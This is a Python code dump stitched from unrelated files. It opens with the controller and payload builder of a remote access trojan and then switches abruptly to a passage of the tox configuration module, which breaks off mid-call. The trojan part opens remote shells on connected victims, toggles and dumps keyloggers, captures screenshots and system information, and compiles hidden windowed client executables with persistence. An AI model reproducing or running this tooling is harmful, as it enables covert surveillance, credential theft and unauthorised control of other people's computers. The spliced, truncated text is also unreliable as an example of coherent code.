]
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_sysinfo(self):
sys.stdout.write("\n")
print("Info : Gathers system information!")
print("Arguments : None")
print("Example : \n")
print("$ sysinfo")
sys.stdout.write("\n")
def help_c_screenshot(self):
sys.stdout.write("\n")
print("Info : Screenshot the current screen and save it on server!")
print("Arguments : None")
print("Example : \n")
print("$ screenshot")
sys.stdout.write("\n")
def help_overall(self):
global __HELP_OVERALL__
print(__HELP_OVERALL__)
sys.exit(0)
def help_bind(self):
global __HELP_BIND__
print(__HELP_BIND__)
sys.exit(0)
def help_generate(self):
global __HELP_GENERATE__
print(__HELP_GENERATE__)
sys.exit(0)
pull = PULL()
class CLIENT:
STATUS = "Active"
MESSAGE = ""
KEY = ")J@NcRfU"
def __init__(self, sock, addr):
self.sock = sock
self.ip = addr[0]
self.port = addr[1]
def acceptor(self):
data = ""
chunk = ""
while True:
chunk = self.sock.recv(4096)
if not chunk:
self.STATUS = "Disconnected"
break
data += chunk.decode('utf-8')
if self.KEY.encode('utf-8') in chunk:
try:
self.MESSAGE = base64.decodebytes(data.rstrip(self.KEY).encode('utf-8')).decode('utf-8')
except UnicodeDecodeError:
self.MESSAGE = base64.decodebytes(data.rstrip(self.KEY).encode('utf-8'))
if not self.MESSAGE:
self.MESSAGE = " "
data = ""
def engage(self):
t = threading.Thread(target=self.acceptor)
t.daemon = True
t.start()
def send_data(self, val):
self.sock.send(base64.encodebytes(val.encode('utf-8')) + self.KEY.encode('utf-8'))
def recv_data(self):
while not self.MESSAGE:
try:
pass
except KeyboardInterrupt:
break
rtval = self.MESSAGE
self.MESSAGE = ""
return rtval
class COMMCENTER:
CLIENTS = []
COUNTER = 0
CURRENT = () #### Current Target Client ####
KEYLOGS = []
def c_help(self, vals):
if len(vals) > 1:
if vals[1] == "sessions":
pull.help_c_sessions()
elif vals[1] == "connect":
pull.help_c_connect()
elif vals[1] == "disconnect":
pull.help_c_disconnect()
elif vals[1] == "clear":
pull.help_c_clear()
elif vals[1] == "shell":
pull.help_c_shell()
elif vals[1] == "keylogger":
pull.help_c_keylogger()
elif vals[1] == "sysinfo":
pull.help_c_sysinfo()
elif vals[1] == "screenshot":
pull.help_c_screenshot()
else:
if self.CURRENT:
pull.help_c_current()
else:
pull.help_c_general()
def get_valid(self, _id):
for client in self.CLIENTS:
if client[0] == int(_id):
return client
return False
def c_ping(self, _id):
return
def c_connect(self, args):
if len(args) == 2:
tgt = self.get_valid(args[1])
if tgt:
self.CURRENT = tgt
else:
sys.stdout.write("\n")
pull.error("No client is associated with that ID!")
sys.stdout.write("\n")
else:
sys.stdout.write("\n")
pull.error("Invalid Syntax!")
sys.stdout.write("\n")
def c_disconnect(self):
self.CURRENT = ()
def c_sessions(self):
headers = (pull.BOLD + 'ID' + pull.END, pull.BOLD + 'IP Address' + pull.END, pull.BOLD + 'Incoming Port' + pull.END, pull.BOLD + 'Status' + pull.END)
lister = []
for client in self.CLIENTS:
toappend = []
toappend.append(pull.RED + str(client[0]) + pull.END)
toappend.append(pull.DARKCYAN + client[1].ip + pull.END)
toappend.append(pull.BLUE + str(client[1].port) + pull.END)
toappend.append(pull.GREEN + client[1].STATUS + pull.END)
lister.append(toappend)
sys.stdout.write("\n")
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def c_shell(self):
result = ""
if self.CURRENT:
sys.stdout.write("\n")
while True:
val = input("# ")
val = "shell:" + val.rstrip(" ").lstrip(" ")
if val:
if val != "shell:exit":
self.CURRENT[1].send_data(val)
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
else:
break
else:
sys.stdout.write("\n")
pull.error("You need to connect before execute this command!")
sys.stdout.write("\n")
def c_clear(self):
subprocess.call(["clear"], shell=True)
def c_keylogger(self, args):
if self.CURRENT:
if len(args) == 2:
if args[1] == "status":
return
elif args[1] == "on":
self.CURRENT[1].send_data("keylogger:on")
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
elif args[1] == "off":
self.CURRENT[1].send_data("keylogger:off")
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
elif args[1] == "dump":
self.CURRENT[1].send_data("keylogger:dump")
result = self.CURRENT[1].recv_data()
dirname = os.path.dirname(__file__)
dirname = os.path.join( dirname, 'keylogs' )
if not os.path.isdir(dirname):
os.mkdir(dirname)
dirname = os.path.join( dirname, '%s' % (self.CURRENT[1].ip) )
if not os.path.isdir(dirname):
os.mkdir(dirname)
fullpath = os.path.join( dirname, datetime.now().strftime("%d-%m-%Y %H:%M:%S.txt") )
fl = open( fullpath, 'w' )
fl.write( result )
fl.close()
pull.print("Dumped: [" + pull.GREEN + fullpath + pull.END + "]")
else:
pull.error("Invalid Syntax!")
else:
pull.error("Invalid Syntax!")
else:
pull.error("You need to connect before execute this command!")
def c_sysinfo(self):
if self.CURRENT:
self.CURRENT[1].send_data("sysinfo:")
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
else:
pull.error("You need to connect before execute this command!")
def c_screenshot(self):
if self.CURRENT:
self.CURRENT[1].send_data("screenshot:")
result = self.CURRENT[1].recv_data()
dirname = os.path.dirname(__file__)
dirname = os.path.join( dirname, 'screenshots' )
if not os.path.isdir(dirname):
os.mkdir(dirname)
dirname = os.path.join( dirname, '%s' % (self.CURRENT[1].ip) )
if not os.path.isdir(dirname):
os.mkdir(dirname)
fullpath = os.path.join( dirname, datetime.now().strftime("%d-%m-%Y %H:%M:%S.png") )
fl = open( fullpath, 'wb' )
fl.write( result )
fl.close()
pull.print("Saved: [" + pull.DARKCYAN + fullpath + pull.END + "]")
else:
pull.error("You need to connect before execute this command!")
def c_exit(self):
sys.stdout.write("\n")
pull.exit("See Ya!\n")
class INTERFACE(COMMCENTER):
SOCKET = None
RUNNER = True
def __init__(self, prs):
self.address = prs.address
self.port = prs.port
def bind(self):
self.SOCKET = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.SOCKET.bind((self.address, self.port))
pull.print("Successfuly Bind to %s%s:%i" % (
pull.RED,
self.address,
self.port,
))
except Exception as e:
pull.exit("Unable to bind to %s%s:%i" % (
pull.RED,
self.address,
self.port,
))
def accept_threads(self):
self.SOCKET.listen(10)
while self.RUNNER:
conn, addr = self.SOCKET.accept()
is_valid = True
self.COUNTER += 1
client = CLIENT(conn, addr)
client.engage()
self.CLIENTS.append(
(
self.COUNTER,
client
)
)
def accept(self):
t = threading.Thread(target=self.accept_threads)
t.daemon = True
t.start()
#### Commands ####
def execute(self, vals):
if vals:
if vals[0] == "exit":
self.c_exit()
elif vals[0] == "help":
self.c_help(vals)
elif vals[0] == "sessions":
self.c_sessions()
elif vals[0] == "ping":
self.c_ping(vals)
elif vals[0] == "connect":
self.c_connect(vals)
elif vals[0] == "disconnect":
self.c_disconnect()
elif vals[0] == "shell":
self.c_shell()
elif vals[0] == "clear":
self.c_clear()
elif vals[0] == "keylogger":
self.c_keylogger(vals)
elif vals[0] == "sysinfo":
self.c_sysinfo()
elif vals[0] == "screenshot":
self.c_screenshot()
def launch(self):
pull.print("Launching Interface! Enter 'help' to get avaible commands! \n")
while True:
val = pull.get_com(self.CURRENT)
self.execute(val.split(" "))
def close(self):
self.SOCKET.close()
class GENERATOR:
data = ""
flname = ""
def __init__(self, prs):
self.address = prs.address
self.port = prs.port
self.source = prs.source
self.persistence = prs.persistence
self.output = self.get_output(prs.output)
self.pather = self.get_path()
self.v_imports = self.get_imports()
self.v_consts = self.get_consts()
self.v_persistence = self.get_persistence()
self.v_sysinfo = self.get_sysinfo()
self.v_screenshot = self.get_screenshot()
self.v_client = self.get_client()
self.v_main = self.get_main()
def get_output(self, out):
rtval = ""
if self.source:
if not out.endswith(".py"):
rtval = (out + ".py")
else:
rtval = out
else:
if platform.system() == "Windows":
if not out.endswith(".exe"):
rtval = (out + ".exe")
else:
rtval = out
elif platform.system() == "Linux":
rtval = (out)
else:
pull.exit("Unrecognized Platform")
return rtval
def get_path(self):
dirname = os.path.dirname(__file__)
dirname = os.path.join(dirname, 'mods')
if os.path.isdir(dirname):
return dirname
else:
pull.exit("Files missing to generate the payload!")
def get_imports(self):
topen = os.path.join(self.pather, 'imports.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_consts(self):
data = "CONSTIP = \"%s\"\nCONSTPT = %i" % (self.address, self.port)
return data
def get_persistence(self):
topen = os.path.join(self.pather, "persistence.py")
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_sysinfo(self):
topen = os.path.join(self.pather, 'sysinfo.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_screenshot(self):
topen = os.path.join(self.pather, 'screenshot.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_client(self):
topen = os.path.join(self.pather, 'client.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_main(self):
topen = os.path.join(self.pather, 'main.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def tmp_dir(self):
dirname = os.path.dirname(__file__)
dirname = os.path.join(dirname, 'tmp')
if not os.path.isdir(dirname):
os.mkdir(dirname)
fname = os.path.join(dirname, 'cl.py')
return (dirname, fname, 'cl.py')
def patch(self):
time.sleep(2)
pull.function("Compiling modules ... ")
self.data = self.v_imports + "\n\n" + self.v_consts + "\n" + self.v_persistence + "\n" + self.v_sysinfo + "\n\n" + \
self.v_screenshot + "\n\n" + self.v_client + "\n\n" + self.v_main
time.sleep(2)
pull.function("Generating source code ...")
fl = open(self.output, 'w')
fl.write(self.data)
fl.close()
time.sleep(2)
pull.print("Code generated successfully!")
pull.print("File: " + self.output)
def generate(self):
time.sleep(2)
pull.function("Compiling modules ... ")
self.data = self.v_imports + "\n\n" + self.v_consts + "\n\n" + self.v_persistence + "\n\n" + self.v_sysinfo + "\n\n" + \
self.v_screenshot + "\n\n" + self.v_client + "\n\n" + self.v_main
time.sleep(2)
pull.function("Generating one time code for binary ")
self.flname = self.tmp_dir()
fl = open(self.flname[1], 'w')
fl.write(self.data)
fl.close()
pull.print("Code generated successfully!")
def compile(self):
pull.function("Compiling generated code /\\")
counter = 1
t = threading.Thread(target=PyInstaller.__main__.run, args=([
'--name=%s' % os.path.basename(self.output),
'--onefile',
'--windowed',
'--log-level=ERROR',
'--distpath=%s' % os.path.dirname(self.output),
'--workpath=%s' % self.flname[0],
os.path.join(self.flname[0], self.flname[2])
],),)
t.daemon = True
t.start()
while t.is_alive():
sys.stdout.write("\r" + pull.BLUE + "[" + pull.UNDERLINE + ":" + pull.END + pull.BLUE + "] " + pull.END + "Elapsed Time: %is" % (counter) + pull.END)
time.sleep(1)
counter += 1
sys.stdout.write("\n")
pull.print("Compiled Successfully!")
def clean(self):
pull.function("Cleaning files and temporary codes")
shutil.rmtree(self.flname[0])
pull.print("File: " + self.output)
class PARSER:
COMMANDS = ['bind', 'generate']
def __init__(self, prs):
self.mode = self.v_mode(prs.mode, prs.help)
self.help = self.v_help(prs.help)
if self.mode == "bind":
self.address = self.v_address(prs.address)
self.port = self.v_port(prs.port)
elif self.mode == "generate":
self.address = self.v_address(prs.address)
self.port = self.v_port(prs.port)
self.output = self.v_output(prs.output)
self.source = prs.source
self.persistence = prs.persistence
def v_help(self, hl):
if hl:
if not self.mode:
pull.help_overall()
else:
if self.mode == "bind":
pull.help_bind()
elif self.mode == "generate":
pull.help_generate()
else:
pull.help_overall()
def v_address(self, str):
return str
def v_port(self, port):
if not port:
pull.exit("You need to Supply a Valid Port Number")
if port <= 0 or port > 65535:
pull.exit("Invalid Port Number")
return port
def v_mode(self, val, hl):
if val:
if val in self.COMMANDS:
return val
else:
pull.exit("No such command found in database")
else:
if not hl:
pull.exit("Invalid Syntax. Refer to the manual!")
def v_output(self, val):
if val:
if os.path.isdir(os.path.dirname(val)):
return val
else:
pull.exit("Directory doesn't exist!")
else:
pull.exit("You must provide an output Path!")
def main():
pull.logo()
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('mode', nargs="?", help="Mode")
parser.add_argument('-h', '--help' , dest="help" , default=False, action="store_true", help="Help Manual")
parser.add_argument('-a', '--address', dest="address", default="", type=str, help="Address to Bind to")
parser.add_argument('-p', '--port' , dest="port" , default=0 , type=int, help="Port to Bind to")
parser.add_argument('-o', '--output' , dest="output" , default="", type=str, help="Complete Path to Output File!")
parser.add_argument('-s', '--source' , dest="source" , default=False, action="store_true", help="Source file")
parser.add_argument('--persistence' , dest="persistence", default=False, action="store_true", help="Persistence")
parser = parser.parse_args()
parser = PARSER(parser)
if parser.mode == "bind":
iface = INTERFACE(parser)
iface.bind()
iface.accept()
iface.launch()
iface.close()
elif parser.mode == "generate":
pull.function("Starting Generator Mode!")
generator = GENERATOR(parser)
if generator.source:
generator.patch()
else:
generator.generate()
generator.compile()
generator.clean()
pull.function("Done")
if __name__ == "__main__":
main()
|
__init__.py
|
from __future__ import print_function
import argparse
import itertools
import os
import random
import re
import shlex
import string
import sys
import traceback
import warnings
from collections import OrderedDict
from fnmatch import fnmatchcase
from subprocess import list2cmdline
from threading import Thread
import pluggy
import py
import toml
from packaging import requirements
from packaging.utils import canonicalize_name
import tox
from tox.constants import INFO
from tox.exception import MissingDependency
from tox.interpreters import Interpreters, NoInterpreterInfo
from tox.reporter import (
REPORTER_TIMESTAMP_ON_ENV,
error,
update_default_reporter,
using,
verbosity1,
)
from tox.util.path import ensure_empty_dir
from tox.util.stdlib import importlib_metadata
from .parallel import ENV_VAR_KEY_PRIVATE as PARALLEL_ENV_VAR_KEY_PRIVATE
from .parallel import ENV_VAR_KEY_PUBLIC as PARALLEL_ENV_VAR_KEY_PUBLIC
from .parallel import add_parallel_config, add_parallel_flags
from .reporter import add_verbosity_commands
try:
from shlex import quote as shlex_quote
except ImportError:
from pipes import quote as shlex_quote
hookimpl = tox.hookimpl
# DEPRECATED - REMOVE - left for compatibility with plugins importing from here.
# Import hookimpl directly from tox instead.
WITHIN_PROVISION = os.environ.get(str("TOX_PROVISION")) == "1"
SUICIDE_TIMEOUT = 0.0
INTERRUPT_TIMEOUT = 0.3
TERMINATE_TIMEOUT = 0.2
_FACTOR_LINE_PATTERN = re.compile(r"^([\w{}\.!,-]+)\:\s+(.+)")
_ENVSTR_SPLIT_PATTERN = re.compile(r"((?:\{[^}]+\})+)|,")
_ENVSTR_EXPAND_PATTERN = re.compile(r"\{([^}]+)\}")
_WHITESPACE_PATTERN = re.compile(r"\s+")
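# Illustrative examples (added comments, not part of tox) of what these patterns handle:
#   _FACTOR_LINE_PATTERN   matches factor-conditional ini lines such as "py38: pytest>=5"
#   _ENVSTR_SPLIT_PATTERN  splits an envlist string like "py{37,38},lint" on commas while
#                          keeping brace groups together
#   _ENVSTR_EXPAND_PATTERN captures the contents of a brace group, e.g. "37,38" from
#                          "py{37,38}", so it can be expanded into py37 and py38
#   _WHITESPACE_PATTERN    is used to split on runs of whitespace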
def get_plugin_manager(plugins=()):
# initialize plugin manager
import tox.venv
pm = pluggy.PluginManager("tox")
pm.add_hookspecs(tox.hookspecs)
pm.register(tox.config)
pm.register(tox.interpreters)
pm.register(tox.venv)
pm.register(tox.session)
from tox import package
pm.register(package)
pm.load_setuptools_entrypoints("tox")
for plugin in plugins:
pm.register(plugin)
pm.check_pending()
return pm
class Parser:
"""Command line and ini-parser control object."""
def __init__(self):
class HelpFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(HelpFormatter, self).__init__(prog, max_help_position=35, width=190)
self.argparser = argparse.ArgumentParser(
description="tox options", add_help=False, prog="tox", formatter_class=HelpFormatter,
)
self._testenv_attr = []
def add_argument(self, *args, **kwargs):
""" add argument to command line parser. This takes the
same arguments that ``argparse.ArgumentParser.add_argument``.
"""
return self.argparser.add_argument(*args, **kwargs)
def add_testenv_attribute(self, name, type, help, default=None, postprocess=None):
""" add an ini-file variable for "testenv" section.
Types are specified as strings like "bool", "line-list", "string", "argv", "path",
"argvlist".
The ``postprocess`` function will be called for each testenv
like ``postprocess(testenv_config=testenv_config, value=value)``
where ``value`` is the value as read from the ini (or the default value)
and ``testenv_config`` is a :py:class:`tox.config.TestenvConfig` instance
which will receive all ini-variables as object attributes.
Any postprocess function must return a value which will then be set
as the final value in the testenv section.
"""
self._testenv_attr.append(VenvAttribute(name, type, default, help, postprocess))
def add_testenv_attribute_obj(self, obj):
""" add an ini-file variable as an object.
This works as the ``add_testenv_attribute`` function but expects
"name", "type", "help", and "postprocess" attributes on the object.
"""
assert hasattr(obj, "name")
assert hasattr(obj, "type")
assert hasattr(obj, "help")
assert hasattr(obj, "postprocess")
self._testenv_attr.append(obj)
def parse_cli(self, args, strict=False):
args, argv = self.argparser.parse_known_args(args)
if argv and (strict or WITHIN_PROVISION):
self.argparser.error("unrecognized arguments: {}".format(" ".join(argv)))
return args
def _format_help(self):
return self.argparser.format_help()
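# --- Illustrative sketch (not part of tox): how a plugin could use the Parser API
# documented above to register a custom testenv attribute. The attribute name
# 'custom_marker' and the helper name are hypothetical; a real plugin would call
# this from its own @tox.hookimpl-decorated tox_addoption(parser) hook.
def _example_add_custom_attribute(parser):
    def postprocess(testenv_config, value):
        # Receives the TestenvConfig being built plus the ini value (or the
        # default) and returns the final value that gets set on the testenv.
        return value.strip().lower()

    parser.add_testenv_attribute(
        name="custom_marker",
        type="string",
        default="none",
        postprocess=postprocess,
        help="example string attribute registered by a plugin",
    )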
class VenvAttribute:
def __init__(self, name, type, default, help, postprocess):
self.name = name
self.type = type
self.default = default
self.help = help
self.postprocess = postprocess
class DepOption:
name = "deps"
type = "line-list"
help = "each line specifies a dependency in pip/setuptools format."
default = ()
def postprocess(self, testenv_config, value):
deps = []
config = testenv_config.config
for depline in value:
m = re.match(r":(\w+):\s*(\S+)", depline)
if m:
iname, name = m.groups()
ixserver = config.indexserver[iname]
else:
name = depline.strip()
ixserver = None
# we need to process options, in case they contain a space,
# as the subprocess call to pip install will otherwise fail.
# in case of a short option, we remove the space
for option in tox.PIP.INSTALL_SHORT_OPTIONS_ARGUMENT:
if name.startswith(option):
name = "{}{}".format(option, name[len(option) :].strip())
# in case of a long option, we add an equal sign
for option in tox.PIP.INSTALL_LONG_OPTIONS_ARGUMENT:
name_start = "{} ".format(option)
if name.startswith(name_start):
name = "{}={}".format(option, name[len(option) :].strip())
name = self._cut_off_dep_comment(name)
name = self._replace_forced_dep(name, config)
deps.append(DepConfig(name, ixserver))
return deps
def _replace_forced_dep(self, name, config):
"""Override given dependency config name. Take ``--force-dep-version`` option into account.
:param name: dep config, for example ["pkg==1.0", "other==2.0"].
:param config: ``Config`` instance
:return: the new dependency that should be used for virtual environments
"""
if not config.option.force_dep:
return name
for forced_dep in config.option.force_dep:
if self._is_same_dep(forced_dep, name):
return forced_dep
return name
@staticmethod
def _cut_off_dep_comment(name):
return re.sub(r"\s+#.*", "", name).strip()
@classmethod
def _is_same_dep(cls, dep1, dep2):
"""Definitions are the same if they refer to the same package, even if versions differ."""
dep1_name = canonicalize_name(requirements.Requirement(dep1).name)
try:
dep2_name = canonicalize_name(requirements.Requirement(dep2).name)
except requirements.InvalidRequirement:
# we couldn't parse a version, probably a URL
return False
return dep1_name == dep2_name
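# --- Minimal sketch (not part of tox): exercising DepOption's static helpers to show
# what "the same dependency" means for --force-dep handling. The requirement strings
# are made up for illustration.
def _example_force_dep_matching():
    # Trailing comments on a deps line are stripped before the dep is recorded.
    assert DepOption._cut_off_dep_comment("pytest>=5  # unit tests") == "pytest>=5"
    # Same canonical package name, different specifiers -> treated as the same dep,
    # so a --force-dep value of "pytest<2.7" would replace "pytest==5.4.3".
    assert DepOption._is_same_dep("pytest<2.7", "pytest==5.4.3")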
class PosargsOption:
name = "args_are_paths"
type = "bool"
default = True
help = "treat positional args in commands as paths"
def postprocess(self, testenv_config, value):
config = testenv_config.config
args = config.option.args
if args:
if value:
args = []
for arg in config.option.args:
if arg and not os.path.isabs(arg):
origpath = os.path.join(config.invocationcwd.strpath, arg)
if os.path.exists(origpath):
arg = os.path.relpath(origpath, testenv_config.changedir.strpath)
args.append(arg)
testenv_config._reader.addsubstitutions(args)
return value
class InstallcmdOption:
name = "install_command"
type = "argv"
default = "python -m pip install {opts} {packages}"
help = "install command for dependencies and package under test."
def postprocess(self, testenv_config, value):
if "{packages}" not in value:
raise tox.exception.ConfigError(
"'install_command' must contain '{packages}' substitution",
)
return value
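# --- Minimal sketch (not part of tox): the postprocess check above rejects any
# install_command override that is missing the {packages} placeholder. The command
# string is illustrative; testenv_config is unused by this particular postprocess.
def _example_install_command_override():
    opt = InstallcmdOption()
    return opt.postprocess(None, "python -m pip install --no-deps {opts} {packages}")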
def parseconfig(args, plugins=()):
"""Parse the configuration file and create a Config object.
:param plugins:
:param list[str] args: list of arguments.
:rtype: :class:`Config`
:raise SystemExit: toxinit file is not found
"""
pm = get_plugin_manager(plugins)
config, option = parse_cli(args, pm)
update_default_reporter(config.option.quiet_level, config.option.verbose_level)
for config_file in propose_configs(option.configfile):
config_type = config_file.basename
content = None
if config_type == "pyproject.toml":
toml_content = get_py_project_toml(config_file)
try:
content = toml_content["tool"]["tox"]["legacy_tox_ini"]
except KeyError:
continue
try:
ParseIni(config, config_file, content)
except SkipThisIni:
continue
pm.hook.tox_configure(config=config) # post process config object
break
else:
parser = Parser()
pm.hook.tox_addoption(parser=parser)
# if there is no tox config file, we now need to do a strict argument
# evaluation and raise on unknown args
parser.parse_cli(args, strict=True)
if option.help or option.helpini:
return config
if option.devenv:
# To load defaults, we parse an empty config
ParseIni(config, py.path.local(), "")
pm.hook.tox_configure(config=config)
return config
msg = "tox config file (either {}) not found"
candidates = ", ".join(INFO.CONFIG_CANDIDATES)
feedback(msg.format(candidates), sysexit=not (option.help or option.helpini))
return config
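# --- Usage sketch (assumption): calling parseconfig programmatically from within a
# project that has a tox configuration file. The argument list is illustrative.
def _example_parseconfig():
    config = parseconfig(["-e", "py38"])
    return list(config.envconfigs)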
def get_py_project_toml(path):
with open(str(path)) as file_handler:
config_data = toml.load(file_handler)
return config_data
def propose_configs(cli_config_file):
from_folder = py.path.local()
if cli_config_file is not None:
if os.path.isfile(cli_config_file):
yield py.path.local(cli_config_file)
return
if os.path.isdir(cli_config_file):
from_folder = py.path.local(cli_config_file)
else:
print(
"ERROR: {} is neither file or directory".format(cli_config_file), file=sys.stderr,
)
return
for basename in INFO.CONFIG_CANDIDATES:
if from_folder.join(basename).isfile():
yield from_folder.join(basename)
for path in from_folder.parts(reverse=True):
ini_path = path.join(basename)
if ini_path.check():
yield ini_path
def parse_cli(args, pm):
parser = Parser()
pm.hook.tox_addoption(parser=parser)
option = parser.parse_cli(args)
if option.version:
print(get_version_info(pm))
raise SystemExit(0)
interpreters = Interpreters(hook=pm.hook)
config = Config(
pluginmanager=pm, option=option, interpreters=interpreters, parser=parser, args=args,
)
return config, option
def feedback(msg, sysexit=False):
print("ERROR: {}".format(msg), file=sys.stderr)
if sysexit:
raise SystemExit(1)
def get_version_info(pm):
out = ["{} imported from {}".format(tox.__version__, tox.__file__)]
plugin_dist_info = pm.list_plugin_distinfo()
if plugin_dist_info:
out.append("registered plugins:")
for mod, egg_info in plugin_dist_info:
source = getattr(mod, "__file__", repr(mod))
out.append(" {}-{} at {}".format(egg_info.project_name, egg_info.version, source))
return "\n".join(out)
class SetenvDict(object):
_DUMMY = object()
def __init__(self, definitions, reader):
self.definitions = definitions
self.reader = reader
self.resolved = {}
self._lookupstack = []
def __repr__(self):
return "{}: {}".format(self.__class__.__name__, self.definitions)
def __contains__(self, name):
return name in self.definitions
def get(self, name, default=None):
try:
return self.resolved[name]
except KeyError:
try:
if name in self._lookupstack:
raise KeyError(name)
val = self.definitions[name]
except KeyError:
return os.environ.get(name, default)
self._lookupstack.append(name)
try:
self.resolved[name] = res = self.reader._replace(val)
finally:
self._lookupstack.pop()
return res
def __getitem__(self, name):
x = self.get(name, self._DUMMY)
if x is self._DUMMY:
raise KeyError(name)
return x
def keys(self):
return self.definitions.keys()
def __setitem__(self, name, value):
self.definitions[name] = value
self.resolved[name] = value
@tox.hookimpl
def tox_addoption(parser):
parser.add_argument(
"--version", action="store_true", help="report version information to stdout.",
)
parser.add_argument("-h", "--help", action="store_true", help="show help about options")
parser.add_argument(
"--help-ini",
"--hi",
action="store_true",
dest="helpini",
help="show help about ini-names",
)
add_verbosity_commands(parser)
parser.add_argument(
"--showconfig",
action="store_true",
help="show live configuration (by default all env, with -l only default targets,"
" specific via TOXENV/-e)",
)
parser.add_argument(
"-l",
"--listenvs",
action="store_true",
help="show list of test environments (with description if verbose)",
)
parser.add_argument(
"-a",
"--listenvs-all",
action="store_true",
help="show list of all defined environments (with description if verbose)",
)
parser.add_argument(
"-c", dest="configfile", help="config file name or directory with 'tox.ini' file.",
)
parser.add_argument(
"-e",
action="append",
dest="env",
metavar="envlist",
help="work against specified environments (ALL selects all).",
)
parser.add_argument(
"--devenv",
metavar="ENVDIR",
help=(
"sets up a development environment at ENVDIR based on the env's tox "
"configuration specified by `-e` (-e defaults to py)."
),
)
parser.add_argument("--notest", action="store_true", help="skip invoking test commands.")
parser.add_argument(
"--sdistonly", action="store_true", help="only perform the sdist packaging activity.",
)
parser.add_argument(
"--skip-pkg-install", action="store_true", help="skip package installation for this run",
)
add_parallel_flags(parser)
parser.add_argument(
"--parallel--safe-build",
action="store_true",
dest="parallel_safe_build",
help="(deprecated) ensure two tox builds can run in parallel "
"(uses a lock file in the tox workdir with .lock extension)",
)
parser.add_argument(
"--installpkg",
metavar="PATH",
help="use specified package for installation into venv, instead of creating an sdist.",
)
parser.add_argument(
"--develop",
action="store_true",
help="install package in the venv using 'setup.py develop' via 'pip -e .'",
)
parser.add_argument(
"-i",
"--index-url",
action="append",
dest="indexurl",
metavar="URL",
help="set indexserver url (if URL is of form name=url set the "
"url for the 'name' indexserver, specifically)",
)
parser.add_argument(
"--pre",
action="store_true",
help="install pre-releases and development versions of dependencies. "
"This will pass the --pre option to install_command "
"(pip by default).",
)
parser.add_argument(
"-r", "--recreate", action="store_true", help="force recreation of virtual environments",
)
parser.add_argument(
"--result-json",
dest="resultjson",
metavar="PATH",
help="write a json file with detailed information "
"about all commands and results involved.",
)
parser.add_argument(
"--discover",
dest="discover",
nargs="+",
metavar="PATH",
help="for python discovery first try the python executables under these paths",
default=[],
)
# We choose 1 to 4294967295 because it is the range of PYTHONHASHSEED.
parser.add_argument(
"--hashseed",
metavar="SEED",
help="set PYTHONHASHSEED to SEED before running commands. "
"Defaults to a random integer in the range [1, 4294967295] "
"([1, 1024] on Windows). "
"Passing 'noset' suppresses this behavior.",
)
parser.add_argument(
"--force-dep",
action="append",
metavar="REQ",
help="Forces a certain version of one of the dependencies "
"when configuring the virtual environment. REQ Examples "
"'pytest<2.7' or 'django>=1.6'.",
)
parser.add_argument(
"--sitepackages",
action="store_true",
help="override sitepackages setting to True in all envs",
)
parser.add_argument(
"--alwayscopy",
action="store_true",
help="override alwayscopy setting to True in all envs",
)
cli_skip_missing_interpreter(parser)
parser.add_argument("--workdir", metavar="PATH", help="tox working directory")
parser.add_argument(
"args",
nargs="*",
help="additional arguments available to command positional substitution",
)
def _set_envdir_from_devenv(testenv_config, value):
if testenv_config.config.option.devenv is not None:
return py.path.local(testenv_config.config.option.devenv)
else:
return value
parser.add_testenv_attribute(
name="envdir",
type="path",
default="{toxworkdir}/{envname}",
help="set venv directory -- be very careful when changing this as tox "
"will remove this directory when recreating an environment",
postprocess=_set_envdir_from_devenv,
)
# add various core venv interpreter attributes
def setenv(testenv_config, value):
setenv = value
config = testenv_config.config
if "PYTHONHASHSEED" not in setenv and config.hashseed is not None:
setenv["PYTHONHASHSEED"] = config.hashseed
setenv["TOX_ENV_NAME"] = str(testenv_config.envname)
setenv["TOX_ENV_DIR"] = str(testenv_config.envdir)
return setenv
parser.add_testenv_attribute(
name="setenv",
type="dict_setenv",
postprocess=setenv,
help="list of X=Y lines with environment variable settings",
)
def basepython_default(testenv_config, value):
"""either user set or proposed from the factor name
in both cases we check that the factor name implied python version and the resolved
python interpreter version match up; if they don't we warn, unless ignore base
python conflict is set in which case the factor name implied version if forced
"""
for factor in testenv_config.factors:
match = tox.PYTHON.PY_FACTORS_RE.match(factor)
if match:
base_exe = {"py": "python"}.get(match.group(1), match.group(1))
version_s = match.group(2)
if not version_s:
version_info = ()
elif len(version_s) == 1:
version_info = (version_s,)
else:
version_info = (version_s[0], version_s[1:])
implied_version = ".".join(version_info)
implied_python = "{}{}".format(base_exe, implied_version)
break
else:
implied_python, version_info, implied_version = None, (), ""
if testenv_config.config.ignore_basepython_conflict and implied_python is not None:
return implied_python
proposed_python = (implied_python or sys.executable) if value is None else str(value)
if implied_python is not None and implied_python != proposed_python:
testenv_config.basepython = proposed_python
python_info_for_proposed = testenv_config.python_info
if not isinstance(python_info_for_proposed, NoInterpreterInfo):
proposed_version = ".".join(
str(x) for x in python_info_for_proposed.version_info[: len(version_info)]
)
if proposed_version != implied_version:
# TODO(stephenfin): Raise an exception here in tox 4.0
warnings.warn(
"conflicting basepython version (set {}, should be {}) for env '{}';"
"resolve conflict or set ignore_basepython_conflict".format(
proposed_version, implied_version, testenv_config.envname,
),
)
return proposed_python
parser.add_testenv_attribute(
name="basepython",
type="basepython",
default=None,
postprocess=basepython_default,
help="executable name or path of interpreter used to create a virtual test environment.",
)
def merge_description(testenv_config, value):
"""the reader by default joins generated description with new line,
replace new line with space"""
return value.replace("\n", " ")
parser.add_testenv_attribute(
name="description",
type="string",
default="",
postprocess=merge_description,
help="short description of this environment",
)
parser.add_testenv_attribute(
name="envtmpdir", type="path", default="{envdir}/tmp", help="venv temporary directory",
)
parser.add_testenv_attribute(
name="envlogdir", type="path", default="{envdir}/log", help="venv log directory",
)
parser.add_testenv_attribute(
name="downloadcache",
type="string",
default=None,
